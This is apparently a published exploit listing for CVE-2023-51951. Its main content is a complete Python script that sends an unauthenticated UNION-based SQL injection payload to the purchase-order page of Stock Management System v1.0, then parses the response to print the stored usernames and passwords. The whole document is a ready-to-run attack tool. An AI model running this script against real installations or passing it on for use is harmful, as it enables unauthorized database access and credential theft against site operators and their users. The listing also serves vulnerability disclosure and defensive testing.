# Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection # Date: February 6, 2024 # Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group # Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip # Tested on: Linux and Windows, XAMPP # CVE-2023-51951 # Vendor: oretnom23 # Version: v1.0 # Exploit Description: # The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the SQL database using an Error-Based Injection attack. import requests from bs4 import BeautifulSoup import argparse def print_header(): print("\033[1m\nStock Management System v1.0\033[0m") print("\033[1mSQL Injection Exploit\033[0m") print("\033[96mby blu3ming\n\033[0m") def parse_response(target_url): try: target_response = requests.get(target_url) soup = BeautifulSoup(target_response.text, 'html.parser') textarea_text = soup.find('textarea', {'name': 'remarks', 'id': 'remarks'}).text # Split the text using ',' as a delimiter users = textarea_text.split(',') for user in users: # Split username and password using ':' as a delimiter username, password = user.split(':') print("| {:<20} | {:<40} |".format(username, password)) except: print("No data could be retrieved. Try again.") def retrieve_data(base_url): target_path = '/sms/admin/?page=purchase_order/manage_po&id=' payload = "'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13+from+users--+-" #Dump users table target_url = base_url + target_path + payload print("+----------------------+------------------------------------------+") print("| {:<20} | {:<40} |".format("username", "password")) print("+----------------------+------------------------------------------+") parse_response(target_url) print("+----------------------+------------------------------------------+\n") if __name__ == "__main__": about = 'Unauthenticated SQL Injection Exploit - Stock Management System' parser = argparse.ArgumentParser(description=about) parser.add_argument('--url', dest='base_url', required=True, help='Stock Management System URL') args = parser.parse_args() print_header() retrieve_data(args.base_url)